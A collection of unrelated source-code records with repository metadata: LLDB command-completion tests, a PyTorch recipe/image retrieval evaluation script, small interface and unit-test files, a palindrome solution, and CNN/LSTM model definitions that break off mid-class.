"""Test that 'watchpoint set ex' completes to 'watchpoint set expression '."""
self.complete_from_to(
'watchpoint set ex',
'watchpoint set expression ')
def test_watchpoint_set_var(self):
"""Test that 'watchpoint set var' completes to 'watchpoint set variable '."""
self.complete_from_to('watchpoint set var', 'watchpoint set variable ')
def test_watchpoint_set_variable_foo(self):
self.build()
lldbutil.run_to_source_breakpoint(self, '// Break here', lldb.SBFileSpec("main.cpp"))
self.complete_from_to('watchpoint set variable fo', 'watchpoint set variable fooo')
# Only complete the first argument.
self.complete_from_to('watchpoint set variable fooo ', 'watchpoint set variable fooo ')
def test_help_fi(self):
"""Test that 'help fi' completes to ['file', 'finish']."""
self.complete_from_to(
'help fi', [
'file', 'finish'])
def test_help_watchpoint_s(self):
"""Test that 'help watchpoint s' completes to 'help watchpoint set '."""
self.complete_from_to('help watchpoint s', 'help watchpoint set ')
@expectedFailureNetBSD
def test_common_complete_watchpoint_ids(self):
subcommands = ['enable', 'disable', 'delete', 'modify', 'ignore']
# Completion should not work without a target.
for subcommand in subcommands:
self.complete_from_to('watchpoint ' + subcommand + ' ',
'watchpoint ' + subcommand + ' ')
# Create a process to provide a target and enable watchpoint setting.
self.build()
lldbutil.run_to_source_breakpoint(self, '// Break here', lldb.SBFileSpec("main.cpp"))
self.runCmd('watchpoint set variable ptr_fooo')
for subcommand in subcommands:
self.complete_from_to('watchpoint ' + subcommand + ' ', ['1'])
def test_settings_append_target_er(self):
"""Test that 'settings append target.er' completes to 'settings append target.error-path'."""
self.complete_from_to(
'settings append target.er',
'settings append target.error-path')
def test_settings_insert_after_target_en(self):
"""Test that 'settings insert-after target.env' completes to 'settings insert-after target.env-vars'."""
self.complete_from_to(
'settings insert-after target.env',
'settings insert-after target.env-vars')
def test_settings_insert_before_target_en(self):
"""Test that 'settings insert-before target.env' completes to 'settings insert-before target.env-vars'."""
self.complete_from_to(
'settings insert-before target.env',
'settings insert-before target.env-vars')
def test_settings_replace_target_ru(self):
"""Test that 'settings replace target.ru' completes to 'settings replace target.run-args'."""
self.complete_from_to(
'settings replace target.ru',
'settings replace target.run-args')
def test_settings_show_term(self):
self.complete_from_to(
'settings show term-',
'settings show term-width')
def test_settings_list_term(self):
self.complete_from_to(
'settings list term-',
'settings list term-width')
def test_settings_remove_term(self):
self.complete_from_to(
'settings remove term-',
'settings remove term-width')
def test_settings_s(self):
"""Test that 'settings s' completes to ['set', 'show']."""
self.complete_from_to(
'settings s', [
'set', 'show'])
def test_settings_set_th(self):
"""Test that 'settings set thread-f' completes to 'settings set thread-format'."""
self.complete_from_to('settings set thread-f', 'settings set thread-format')
def test_settings_s_dash(self):
"""Test that 'settings set --g' completes to 'settings set --global'."""
self.complete_from_to('settings set --g', 'settings set --global')
def test_settings_clear_th(self):
"""Test that 'settings clear thread-f' completes to 'settings clear thread-format'."""
self.complete_from_to(
'settings clear thread-f',
'settings clear thread-format')
def test_settings_set_ta(self):
"""Test that 'settings set ta' completes to 'settings set target.'."""
self.complete_from_to(
'settings set target.ma',
'settings set target.max-')
def test_settings_set_target_exec(self):
"""Test that 'settings set target.exec' completes to 'settings set target.exec-search-paths '."""
self.complete_from_to(
'settings set target.exec',
'settings set target.exec-search-paths')
def test_settings_set_target_pr(self):
"""Test that 'settings set target.pr' completes to [
'target.prefer-dynamic-value', 'target.process.']."""
self.complete_from_to('settings set target.pr',
['target.prefer-dynamic-value',
'target.process.'])
def test_settings_set_target_process(self):
"""Test that 'settings set target.process' completes to 'settings set target.process.'."""
self.complete_from_to(
'settings set target.process',
'settings set target.process.')
def test_settings_set_target_process_dot(self):
"""Test that 'settings set target.process.t' completes to 'settings set target.process.thread.'."""
self.complete_from_to(
'settings set target.process.t',
'settings set target.process.thread.')
def test_settings_set_target_process_thread_dot(self):
"""Test that 'settings set target.process.thread.' completes to [
'target.process.thread.step-avoid-regexp', 'target.process.thread.trace-thread']."""
self.complete_from_to('settings set target.process.thread.',
['target.process.thread.step-avoid-regexp',
'target.process.thread.trace-thread'])
def test_thread_plan_discard(self):
self.build()
(_, _, thread, _) = lldbutil.run_to_source_breakpoint(self,
'ptr_foo', lldb.SBFileSpec("main.cpp"))
self.assertTrue(thread)
self.complete_from_to('thread plan discard ', 'thread plan discard ')
source_path = os.path.join(self.getSourceDir(), "thread_plan_script.py")
self.runCmd("command script import '%s'"%(source_path))
self.runCmd("thread step-scripted -C thread_plan_script.PushPlanStack")
self.complete_from_to('thread plan discard ', 'thread plan discard 1')
self.runCmd('thread plan discard 1')
def test_target_space(self):
"""Test that 'target ' completes to ['create', 'delete', 'list',
'modules', 'select', 'stop-hook', 'variable']."""
self.complete_from_to('target ',
['create',
'delete',
'list',
'modules',
'select',
'stop-hook',
'variable'])
def test_target_modules_dump_line_table(self):
"""Tests source file completion by completing the line-table argument."""
self.build()
self.dbg.CreateTarget(self.getBuildArtifact("a.out"))
self.complete_from_to('target modules dump line-table main.cp',
['main.cpp'])
def test_target_modules_load_aout(self):
"""Tests modules completion by completing the target modules load argument."""
self.build()
self.dbg.CreateTarget(self.getBuildArtifact("a.out"))
self.complete_from_to('target modules load a.ou',
['a.out'])
def test_target_modules_search_paths_insert(self):
# Completion won't work without a valid target.
self.complete_from_to("target modules search-paths insert ", "target modules search-paths insert ")
self.build()
target = self.dbg.CreateTarget(self.getBuildArtifact('a.out'))
self.assertTrue(target, VALID_TARGET)
self.complete_from_to("target modules search-paths insert ", "target modules search-paths insert ")
self.runCmd("target modules search-paths add a b")
self.complete_from_to("target modules search-paths insert ", "target modules search-paths insert 0")
# Completion only works for the first arg.
self.complete_from_to("target modules search-paths insert 0 ", "target modules search-paths insert 0 ")
def test_target_create_dash_co(self):
"""Test that 'target create --co' completes to 'target variable --core '."""
self.complete_from_to('target create --co', 'target create --core ')
def test_target_va(self):
"""Test that 'target va' completes to 'target variable '."""
self.complete_from_to('target va', 'target variable ')
def test_common_completion_thread_index(self):
subcommands = ['continue', 'info', 'exception', 'select',
'step-in', 'step-inst', 'step-inst-over', 'step-out', 'step-over', 'step-script']
# Completion should do nothing without threads.
for subcommand in subcommands:
self.complete_from_to('thread ' + subcommand + ' ',
'thread ' + subcommand + ' ')
self.build()
lldbutil.run_to_source_breakpoint(self, '// Break here', lldb.SBFileSpec("main.cpp"))
# At least we have the thread at the index of 1 now.
for subcommand in subcommands:
self.complete_from_to('thread ' + subcommand + ' ', ['1'])
def test_common_completion_type_category_name(self):
subcommands = ['delete', 'list', 'enable', 'disable', 'define']
for subcommand in subcommands:
self.complete_from_to('type category ' + subcommand + ' ', ['default'])
self.complete_from_to('type filter add -w ', ['default'])
def test_command_argument_completion(self):
"""Test completion of command arguments"""
self.complete_from_to("watchpoint set variable -", ["-w", "-s"])
self.complete_from_to('watchpoint set variable -w', 'watchpoint set variable -w ')
self.complete_from_to("watchpoint set variable --", ["--watch", "--size"])
self.complete_from_to("watchpoint set variable --w", "watchpoint set variable --watch")
self.complete_from_to('watchpoint set variable -w ', ['read', 'write', 'read_write'])
self.complete_from_to("watchpoint set variable --watch ", ["read", "write", "read_write"])
self.complete_from_to("watchpoint set variable --watch w", "watchpoint set variable --watch write")
self.complete_from_to('watchpoint set variable -w read_', 'watchpoint set variable -w read_write')
# Now try the same thing with a variable name (non-option argument) to
# test that getopts arg reshuffling doesn't confuse us.
self.complete_from_to("watchpoint set variable foo -", ["-w", "-s"])
self.complete_from_to('watchpoint set variable foo -w', 'watchpoint set variable foo -w ')
self.complete_from_to("watchpoint set variable foo --", ["--watch", "--size"])
self.complete_from_to("watchpoint set variable foo --w", "watchpoint set variable foo --watch")
self.complete_from_to('watchpoint set variable foo -w ', ['read', 'write', 'read_write'])
self.complete_from_to("watchpoint set variable foo --watch ", ["read", "write", "read_write"])
self.complete_from_to("watchpoint set variable foo --watch w", "watchpoint set variable foo --watch write")
self.complete_from_to('watchpoint set variable foo -w read_', 'watchpoint set variable foo -w read_write')
    def test_command_script_delete(self):
        """'command script delete' completes user command names together with
        each command's help text as the completion description."""
        self.runCmd("command script add -h test_desc -f none -s current usercmd1")
        self.check_completion_with_desc('command script delete ', [['usercmd1', 'test_desc']])
    def test_command_delete(self):
        """'command delete' completes names of user-defined regex commands."""
        self.runCmd(r"command regex test_command s/^$/finish/ 's/([0-9]+)/frame select %1/'")
        self.complete_from_to('command delete test_c', 'command delete test_command')
    def test_command_unalias(self):
        """'command unalias' completes existing alias names (e.g. 'image')."""
        self.complete_from_to('command unalias ima', 'command unalias image')
    def test_completion_description_commands(self):
        """Test descriptions of top-level command completions"""
        # An empty line completes to all top-level commands with their help text.
        self.check_completion_with_desc("", [
            ["command", "Commands for managing custom LLDB commands."],
            ["breakpoint", "Commands for operating on breakpoints (see 'help b' for shorthand.)"]
        ])
        self.check_completion_with_desc("pl", [
            ["platform", "Commands to manage and create platforms."],
            ["plugin", "Commands for managing LLDB plugins."]
        ])
        # Just check that this doesn't crash.
        self.check_completion_with_desc("comman", [])
        self.check_completion_with_desc("non-existent-command", [])
    def test_completion_description_command_options(self):
        """Test descriptions of command options"""
        # Short options
        self.check_completion_with_desc("breakpoint set -", [
            ["-h", "Set the breakpoint on exception catcH."],
            ["-w", "Set the breakpoint on exception throW."]
        ])
        # Long options.
        self.check_completion_with_desc("breakpoint set --", [
            ["--on-catch", "Set the breakpoint on exception catcH."],
            ["--on-throw", "Set the breakpoint on exception throW."]
        ])
        # Ambiguous long options.
        self.check_completion_with_desc("breakpoint set --on-", [
            ["--on-catch", "Set the breakpoint on exception catcH."],
            ["--on-throw", "Set the breakpoint on exception throW."]
        ])
        # Unknown long option.
        self.check_completion_with_desc("breakpoint set --Z", [
        ])
    def test_common_completion_frame_index(self):
        """Frame-index arguments complete once a process is stopped at a breakpoint."""
        self.build()
        lldbutil.run_to_source_breakpoint(self, '// Break here', lldb.SBFileSpec("main.cpp"))
        self.complete_from_to('frame select ', ['0'])
        self.complete_from_to('thread backtrace -s ', ['0'])
    def test_frame_recognizer_delete(self):
        """'frame recognizer delete' completes recognizer ids with a
        description naming the class, module and symbol."""
        self.runCmd("frame recognizer add -l py_class -s module_name -n recognizer_name")
        self.check_completion_with_desc('frame recognizer delete ', [['0', 'py_class, module module_name, symbol recognizer_name']])
    def test_platform_install_local_file(self):
        """'platform target-install' completes local file names."""
        self.complete_from_to('platform target-install main.cp', 'platform target-install main.cpp')
    @expectedFailureAll(oslist=["windows"], bugnumber="llvm.org/pr24489")
    def test_symbol_name(self):
        """'breakpoint set -n' completes symbol names from the target."""
        self.build()
        self.dbg.CreateTarget(self.getBuildArtifact("a.out"))
        self.complete_from_to('breakpoint set -n Fo',
                              'breakpoint set -n Foo::Bar(int,\\ int)',
                              turn_off_re_match=True)
        # No completion for Qu because the candidate is
        # (anonymous namespace)::Quux().
        self.complete_from_to('breakpoint set -n Qu', '')
def test_completion_type_formatter_delete(self):
self.runCmd('type filter add --child a Aoo')
self.complete_from_to('type filter delete ', ['Aoo'])
self.runCmd('type filter add --child b -x Boo')
self.complete_from_to('type filter delete ', ['Boo'])
self.runCmd('type format add -f hex Coo')
self.complete_from_to('type format delete ', ['Coo'])
self.runCmd('type format add -f hex -x Doo')
self.complete_from_to('type format delete ', ['Doo'])
self.runCmd('type summary add -c Eoo')
self.complete_from_to('type summary delete ', ['Eoo'])
self.runCmd('type summary add -x -c Foo')
self.complete_from_to('type summary delete ', ['Foo'])
self.runCmd('type synthetic add Goo -l test')
self.complete_from_to('type synthetic delete ', ['Goo'])
self.runCmd('type synthetic add -x Hoo -l test')
self.complete_from_to('type synthetic delete ', ['Hoo'])
    @skipIf(archs=no_match(['x86_64']))
    def test_register_read_and_write_on_x86(self):
        """Test the completion of the commands register read and write on x86"""
        # The tab completion for "register read/write" won't work without a running process.
        self.complete_from_to('register read ',
                              'register read ')
        self.complete_from_to('register write ',
                              'register write ')
        self.build()
        self.main_source_spec = lldb.SBFileSpec("main.cpp")
        lldbutil.run_to_source_breakpoint(self, '// Break here', self.main_source_spec)
        # test cases for register read
        self.complete_from_to('register read ',
                              ['rax',
                               'rbx',
                               'rcx'])
        self.complete_from_to('register read r',
                              ['rax',
                               'rbx',
                               'rcx'])
        self.complete_from_to('register read ra',
                              'register read rax')
        # register read can take multiple register names as arguments
        self.complete_from_to('register read rax ',
                              ['rax',
                               'rbx',
                               'rcx'])
        # complete with prefix '$'
        self.completions_match('register read $rb',
                               ['$rbx',
                                '$rbp'])
        self.completions_match('register read $ra',
                               ['$rax'])
        self.complete_from_to('register read rax $',
                              ['\$rax',
                               '\$rbx',
                               '\$rcx'])
        self.complete_from_to('register read $rax ',
                              ['rax',
                               'rbx',
                               'rcx'])
        # test cases for register write
        self.complete_from_to('register write ',
                              ['rax',
                               'rbx',
                               'rcx'])
        self.complete_from_to('register write r',
                              ['rax',
                               'rbx',
                               'rcx'])
        self.complete_from_to('register write ra',
                              'register write rax')
        self.complete_from_to('register write rb',
                              ['rbx',
                               'rbp'])
        # register write can only take exact one register name as argument
        self.complete_from_to('register write rbx ',
                              [])
    def test_common_completion_target_stophook_ids(self):
        """Stop-hook subcommands complete stop-hook ids, but only for the
        first argument and only once a target with hooks exists."""
        subcommands = ['delete', 'enable', 'disable']
        # Without a target there is nothing to complete.
        for subcommand in subcommands:
            self.complete_from_to('target stop-hook ' + subcommand + ' ',
                                  'target stop-hook ' + subcommand + ' ')
        self.build()
        self.dbg.CreateTarget(self.getBuildArtifact("a.out"))
        self.runCmd('target stop-hook add test DONE')
        for subcommand in subcommands:
            self.complete_from_to('target stop-hook ' + subcommand + ' ',
                                  'target stop-hook ' + subcommand + ' 1')
        # Completion should work only on the first argument.
        for subcommand in subcommands:
            self.complete_from_to('target stop-hook ' + subcommand + ' 1 ',
                                  'target stop-hook ' + subcommand + ' 1 ')
    def test_common_completion_type_language(self):
        """'type category -l' completes source-language names."""
        self.complete_from_to('type category -l ', ['c'])
    def test_target_modules_load_dash_u(self):
        """'target modules load -u' completes module UUID strings."""
        self.build()
        target = self.dbg.CreateTarget(self.getBuildArtifact("a.out"))
        self.complete_from_to('target modules load -u ', [target.GetModuleAtIndex(0).GetUUIDString()])
    def test_complete_breakpoint_with_ids(self):
        """These breakpoint subcommands should be completed with a list of breakpoint ids"""
        subcommands = ['enable', 'disable', 'delete', 'modify', 'name add', 'name delete', 'write']
        # The tab completion here is unavailable without a target
        for subcommand in subcommands:
            self.complete_from_to('breakpoint ' + subcommand + ' ',
                                  'breakpoint ' + subcommand + ' ')
        self.build()
        target = self.dbg.CreateTarget(self.getBuildArtifact('a.out'))
        self.assertTrue(target, VALID_TARGET)
        # One breakpoint -> one id offered.
        bp = target.BreakpointCreateByName('main', 'a.out')
        self.assertTrue(bp)
        self.assertEqual(bp.GetNumLocations(), 1)
        for subcommand in subcommands:
            self.complete_from_to('breakpoint ' + subcommand + ' ',
                                  ['1'])
        # A second breakpoint adds a second id to the candidate list.
        bp2 = target.BreakpointCreateByName('Bar', 'a.out')
        self.assertTrue(bp2)
        self.assertEqual(bp2.GetNumLocations(), 1)
        for subcommand in subcommands:
            self.complete_from_to('breakpoint ' + subcommand + ' ',
                                  ['1',
                                   '2'])
        # Ids keep completing after one has already been given.
        for subcommand in subcommands:
            self.complete_from_to('breakpoint ' + subcommand + ' 1 ',
                                  ['1',
                                   '2'])
    def test_complete_breakpoint_with_names(self):
        """'breakpoint read -N' and 'breakpoint set -N' complete breakpoint names."""
        self.build()
        target = self.dbg.CreateTarget(self.getBuildArtifact('a.out'))
        self.assertTrue(target, VALID_TARGET)
        # test breakpoint read dedicated
        self.complete_from_to('breakpoint read -N ', 'breakpoint read -N ')
        self.complete_from_to('breakpoint read -f breakpoints.json -N ', ['mm'])
        self.complete_from_to('breakpoint read -f breakpoints.json -N n', 'breakpoint read -f breakpoints.json -N n')
        self.complete_from_to('breakpoint read -f breakpoints_invalid.json -N ', 'breakpoint read -f breakpoints_invalid.json -N ')
        # test common breakpoint name completion
        bp1 = target.BreakpointCreateByName('main', 'a.out')
        self.assertTrue(bp1)
        self.assertEqual(bp1.GetNumLocations(), 1)
        self.complete_from_to('breakpoint set -N n', 'breakpoint set -N n')
        self.assertTrue(bp1.AddNameWithErrorHandling("nn"))
        self.complete_from_to('breakpoint set -N ', 'breakpoint set -N nn')
|
[
"kontoshi0317@gmail.com"
] |
kontoshi0317@gmail.com
|
5913393d13501aaea1b1b337a3fd465a3da7f4a5
|
9fbc93493617fb4d5b1c18ee3771095928ac917a
|
/association_model_and_GAN/evaluate_cross_model.py
|
f1b2d49bdf65d850ab48404c782dd385d44624dc
|
[
"MIT"
] |
permissive
|
CorneliusHsiao/FoodMethodGAN
|
0883ab6e09ff71544f9d067ee3a0288646ca8c83
|
9e68dfabd48afe337ac95189a728dfdab075afe5
|
refs/heads/master
| 2020-09-04T08:51:35.506411
| 2019-12-26T10:57:44
| 2019-12-26T10:57:44
| 219,697,249
| 0
| 1
|
MIT
| 2019-12-06T04:54:00
| 2019-11-05T08:42:58
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 3,749
|
py
|
import os
import json
import numpy as np
import torch
from torch import nn
from torch.utils.data import DataLoader
from tqdm import tqdm
from args import args
from networks import TextEncoder, ImageEncoder
from utils import transform, Dataset, rank
######################################################
# preprocess
######################################################
# Evaluation script: embeds test recipes and images with the trained
# encoders and reports cross-modal retrieval metrics (MedR, Recall@k).
device = torch.device('cuda' if torch.cuda.is_available() and args.cuda else 'cpu')
print('device:', device)
if device.__str__() == 'cpu':
    args.batch_size = 16
with open(os.path.join(args.data_dir, 'ingrs2numV2.json'), 'r') as f:
    ingrs_dict = json.load(f)
method_dict = {'baking': 0, 'frying':1, 'roasting':2, 'grilling':3,
               'simmering':4, 'broiling':5, 'poaching':6, 'steaming':7,
               'searing':8, 'stewing':9, 'braising':10, 'blanching':11}
# Offset cooking-method ids so they follow the ingredient vocabulary in
# one shared one-hot input space of size len(ingrs) + len(methods).
for _ in method_dict.keys():
    method_dict[_] += len(ingrs_dict)
in_dim = len(ingrs_dict) + len(method_dict)
######################################################
# dataset
######################################################
test_set = Dataset(
    part='test',
    data_dir=args.data_dir,
    img_dir=args.img_dir,
    ingrs_dict=ingrs_dict,
    method_dict=method_dict,
    transform=transform)
test_loader = DataLoader(
    test_set, batch_size=args.batch_size, shuffle=True,
    num_workers=args.workers, pin_memory=True)
print('test data:', len(test_set), len(test_loader))
######################################################
# model
######################################################
TxtEnc = TextEncoder(
    data_dir=args.data_dir, in_dim=in_dim, hid_dim=args.hid_dim, z_dim=args.z_dim).to(device)
ImgEnc = ImageEncoder(z_dim=args.z_dim, ckpt_path=args.upmc_model).to(device)
# Evaluation only: freeze dropout/batch-norm behaviour.
TxtEnc.eval()
ImgEnc.eval()
ImgEnc = nn.DataParallel(ImgEnc)
# A trained checkpoint is mandatory for evaluation.
assert args.resume != ''
print('load from ckpt: ', args.resume)
ckpt = torch.load(args.resume)
TxtEnc.load_state_dict(ckpt['weights_recipe'])
ImgEnc.load_state_dict(ckpt['weights_image'])
######################### evaluate ########################
print('Evaluating...')
imgs = []
rcps = []
for batch in tqdm(test_loader):
    recipe = batch
    # recipe[0]: recipe one-hot input, recipe[1]: image tensor — TODO confirm
    # against Dataset.__getitem__.
    recipe[0], recipe[1] = recipe[0].to(device), recipe[1].to(device)
    with torch.no_grad():
        txts_sub = TxtEnc(recipe[0])
        imgs_sub = ImgEnc(recipe[1])
    rcps.append(txts_sub.detach().cpu().numpy())
    imgs.append(imgs_sub.detach().cpu().numpy())
rcps = np.concatenate(rcps, axis=0)
imgs = np.concatenate(imgs, axis=0)
# Report retrieval in both directions over several candidate-pool sizes.
for retrieved_type in ['recipe', 'image']:
    for retrieved_range in [1000, 5000, 10000]:
        print(retrieved_type, retrieved_range)
        print('=> computing ranks...')
        medR, medR_std, recalls = rank(rcps, imgs, retrieved_type, retrieved_range)
        print('=> val MedR: {:.4f}({:.4f})'.format(medR, medR_std))
        for k,v in recalls.items():
            print('Recall@{}'.format(k), v)
"""
recipe 1000
=> computing ranks...
=> val MedR: 4.4000(0.4899)
Recall@1 0.26080000000000003
Recall@5 0.5485000000000001
Recall@10 0.6794
recipe 5000
=> computing ranks...
=> val MedR: 17.9000(0.5385)
Recall@1 0.11638
Recall@5 0.29918
Recall@10 0.40630000000000005
recipe 10000
=> computing ranks...
=> val MedR: 34.9000(0.8307)
Recall@1 0.07719000000000001
Recall@5 0.21172999999999997
Recall@10 0.3009799999999999
image 1000
=> computing ranks...
=> val MedR: 4.2000(0.4000)
Recall@1 0.27019999999999994
Recall@5 0.5561999999999999
Recall@10 0.6819000000000001
image 5000
=> computing ranks...
=> val MedR: 16.7000(0.7810)
Recall@1 0.12888
Recall@5 0.3148
Recall@10 0.4207199999999999
image 10000
=> computing ranks...
=> val MedR: 32.7000(1.1874)
Recall@1 0.08757
Recall@5 0.22885
Recall@10 0.31910000000000005
"""
|
[
"apple@appledeair-3.home"
] |
apple@appledeair-3.home
|
a304c942ed7c7626de03bb882fa1f3874e28c124
|
c9aa803d2aac3f68f8b7b43e1cb4b7eeeb808292
|
/framework/interface_expert.py
|
bb183a46ad71a0111191c8f58940e5f44731cd7b
|
[] |
no_license
|
JannisWolf/deep_q_learning_trader
|
6bc1e60aba61a82005025b0827746551ba1816ce
|
5daa9b7c28b884d261674a499455ea2face0776a
|
refs/heads/master
| 2022-11-25T07:59:41.659295
| 2020-05-17T12:15:39
| 2020-05-17T12:15:39
| 199,337,826
| 5
| 2
| null | 2022-11-21T21:31:56
| 2019-07-28T21:14:07
|
Python
|
UTF-8
|
Python
| false
| false
| 594
|
py
|
from abc import ABC, abstractmethod
from framework.stock_data import StockData
from framework.vote import Vote
class IExpert(ABC):
    """
    Expert interface (abstract base class), that forces experts to have a vote method
    """

    @abstractmethod
    def vote(self, data: StockData) -> Vote:
        """
        The expert votes on the stock of a company, given a company's historical stock data.

        Args:
            data: Historical stock data of a company

        Returns:
            A vote, which is either buy, hold, or sell
        """
        pass
|
[
"jannis.wolf@fau.de"
] |
jannis.wolf@fau.de
|
0332f7b4ea3e1b6e128be195810588f7d85744a6
|
e2affa48dd79a57b06e6ef14900e4b527597fa25
|
/src/delegation_module_tests/goal_wrappers_unit_test.py
|
89d8966d91b834218b7e7d58c82018f45f9cba7d
|
[] |
no_license
|
ros-hybrid-behaviour-planner/delegation_module
|
0119983dc36f0d1ed81b362b79606695a081f99c
|
2b88fef67dacf2b46bc443ce8e66cdaec01e3e2c
|
refs/heads/master
| 2020-07-01T01:51:09.973767
| 2019-08-25T21:34:32
| 2019-08-25T21:34:32
| 201,012,510
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,182
|
py
|
"""
Unit tests for the GoalWrapper
@author: Mengers
"""
import unittest
from delegation_components.goal_wrappers import GoalWrapperBase
class GoalWrapper(GoalWrapperBase):
    """
    Version of the GoalWrapper without abstract methods

    Minimal concrete stub used by the unit tests: send_goal() just records
    the given name as the "goal"; liveness/finished checks always succeed.
    """

    def get_goal_representation(self):
        # No representation needed for these tests.
        return

    def send_goal(self, name):
        # Mark the goal as created and remember the name as the goal object.
        self._created_goal = True
        self._goal = name
        return

    def terminate_goal(self):
        return

    def check_if_still_alive(self):
        return True

    def check_goal_finished(self):
        return True
class TestGoalWrapper(unittest.TestCase):
    """
    Unit tests for the base functionality of the GoalWrapperBase
    """

    def test_base_functions(self):
        """
        Tests base functionality: name property, goal-created flag,
        get_goal() raising before a goal exists and returning it afterwards.
        """
        test_name = "Test"
        test_goal = "test_goal"
        uut = GoalWrapper(name=test_name)
        self.assertEqual(test_name, uut.goal_name)
        # Before send_goal(): no goal yet, get_goal() must raise.
        self.assertFalse(uut.goal_is_created())
        self.assertRaises(RuntimeError, uut.get_goal)
        uut.send_goal(name=test_goal)
        self.assertTrue(uut.goal_is_created())
        self.assertEqual(uut.get_goal(), test_goal)
|
[
"v.mengers@campus.tu-berlin.de"
] |
v.mengers@campus.tu-berlin.de
|
d6d0d58f05ad22c9474ef9804ec088549a68f841
|
5b6b2018ab45cc4710cc5146040bb917fbce985f
|
/200_longest-palindromic-substring/longest-palindromic-substring.py
|
60710ba54ef2ad0d3d20d4f30fd1db4aec65a148
|
[] |
no_license
|
ultimate010/codes_and_notes
|
6d7c7d42dcfd84354e6fcb5a2c65c6029353a328
|
30aaa34cb1c840f7cf4e0f1345240ac88b8cb45c
|
refs/heads/master
| 2021-01-11T06:56:11.401869
| 2016-10-30T13:46:39
| 2016-10-30T13:46:39
| 72,351,982
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,016
|
py
|
# coding:utf-8
'''
@Copyright:LintCode
@Author: ultimate010
@Problem: http://www.lintcode.com/problem/longest-palindromic-substring
@Language: Python
@Datetime: 16-06-28 14:08
'''
class Solution:
    # @param {string} s input string
    # @return {string} the longest palindromic substring
    def longestPalindrome(self, s):
        """Return the longest palindromic substring of s.

        Expands around each of the 2*n - 1 possible palindrome centers
        (n single characters plus n - 1 gaps between characters) and keeps
        the first longest match found.  O(n^2) time, O(1) extra space.

        Fixes over the original:
        - uses floor division (//) so indices stay ints under Python 3;
        - returns a single character (not '') when no longer palindrome
          exists, e.g. 'ab' -> 'a';
        - removes the dead `if t == i: pass` branch.
        """
        n = len(s)
        if n <= 1:
            return s
        best_len = 1
        best = s[0]  # any single character is a palindrome
        for i in range(1, 2 * n):  # at least 2 chars considered per center
            if i & 1 == 1:  # odd index: center on character i // 2
                t = i // 2
                j = t
            else:  # even index: center between characters t and j
                t = i // 2 - 1
                j = t + 1
            # Expand outwards while the characters mirror each other.
            while t >= 0 and j < n and s[t] == s[j]:
                t -= 1
                j += 1
            # After the loop the palindrome is s[t + 1 : j], length j - t - 1.
            if j - t - 1 > best_len:
                best_len = j - t - 1
                best = s[t + 1: j]
        return best
|
[
"ultimate010@gmail.com"
] |
ultimate010@gmail.com
|
dd2e5c7bb3b8cf73d47ad7e62b333762de574f25
|
7a7b8dc77ce5f1a59270fb6d262e354f998175f5
|
/old_contrib/v2/my_models.py
|
29561edb0331873edf23b6889734b36d63eb8bb1
|
[] |
no_license
|
ismail0T/CE7454_project
|
2b8f686f4e631293d0206b4edd62cadbd2d676b7
|
d4c247d06633dcbd95c99fd00a83693103636a22
|
refs/heads/master
| 2020-08-01T22:40:29.072696
| 2019-11-17T03:53:37
| 2019-11-17T03:53:37
| 211,141,219
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 32,052
|
py
|
import random
import torch
import torch.nn as nn
import torch.nn.functional as F
from tcn import TemporalConvNet
class ConvSimple(nn.Module):
    """Plain 1-D CNN classifier over 3000-sample signals.

    Three conv stages (each: two convs + avg-pool + dropout) followed by a
    128-d fully-connected feature layer and a 5-class linear head.
    forward() returns (logits, 128-d features).
    """

    def __init__(self):
        super(ConvSimple, self).__init__()
        self.n_classes = 5
        # Stage 1: strided convs shrink 3000 samples aggressively.
        self.conv1 = nn.Conv1d(1, 32, kernel_size=10, padding=1, stride=3)
        self.conv2 = nn.Conv1d(32, 32, kernel_size=10, padding=1, stride=3)
        self.pool1 = nn.AvgPool1d(2, stride=6)
        # Stage 2.
        self.conv3 = nn.Conv1d(32, 64, kernel_size=3, padding=1)
        self.conv4 = nn.Conv1d(64, 64, kernel_size=3, padding=1)
        self.pool2 = nn.AvgPool1d(2, stride=2)
        # Stage 3.
        self.conv5 = nn.Conv1d(64, 256, kernel_size=3, padding=1)
        self.conv6 = nn.Conv1d(256, 256, kernel_size=3, padding=1)
        self.pool_avg = nn.AvgPool1d(2)
        # 256 channels x 13 samples = 3328 flattened features.
        self.linear1 = nn.Linear(3328, 128)
        self.dropout1 = nn.Dropout(0.2)
        # LL2: 128 --> classes
        self.linear2 = nn.Linear(128, self.n_classes)

    def forward(self, x):
        # Stage 1: conv -> relu -> conv -> relu -> pool -> dropout.
        x = self.pool1(F.relu(self.conv2(F.relu(self.conv1(x)))))
        x = self.dropout1(x)
        # Stage 2.
        x = self.pool2(F.relu(self.conv4(F.relu(self.conv3(x)))))
        x = self.dropout1(x)
        # Stage 3.
        x = self.pool_avg(F.relu(self.conv6(F.relu(self.conv5(x)))))
        x = self.dropout1(x)
        # Flatten and project to the 128-d feature space.
        flat = x.reshape(x.size(0), x.size(1) * x.size(2))
        features = F.relu(self.linear1(flat))
        logits = self.linear2(self.dropout1(features))
        return logits, features
class ConvLSTM01(nn.Module):
    """Three-stage 1-D CNN feature extractor followed by an (optionally
    bidirectional) LSTM classifier over the per-batch feature sequence.

    forward() expects x of shape (batch, 1, 3000) — TODO confirm — and the
    LSTM's previous (h, c) state; it returns (scores, h_final, c_final).
    """

    def __init__(self, bi_dir):
        super(ConvLSTM01, self).__init__()
        self.n_classes = 5
        self.hidden_dim = 256
        self.bi_dir = bi_dir  # True -> bidirectional LSTM, doubled head width
        # CL1: 28 x 28 --> 64 x 3'000
        self.conv1 = nn.Conv1d(1, 16, kernel_size=10, padding=1, stride=2)
        # MP1: 64 x 3'000 --> 64 x 1'500
        self.pool1 = nn.MaxPool1d(2, stride=4)
        # CL2: 64 x 1'500 --> 64 x 1'500
        self.conv2 = nn.Conv1d(16, 32, kernel_size=3, padding=1)
        # MP2: 64 x 1'500 --> 64 x 750
        self.pool2 = nn.MaxPool1d(2)
        # CL3: 64 x 750 --> 64 x 750
        self.conv3 = nn.Conv1d(32, 64, kernel_size=3, padding=1)
        self.to_pad = 1
        # MP3: 64 x 750 --> 64 x 375
        self.pool3 = nn.MaxPool1d(2, padding=self.to_pad)
        self.linear1 = nn.Linear(6016, 256)
        self.dropout1 = nn.Dropout(0.5)
        self.dropout2 = nn.Dropout(0.7)
        # LL2: 128 --> classes
        # self.linear2 = nn.Linear(128, self.n_classes)
        # LSTM
        self.lstm_in_dim = 256
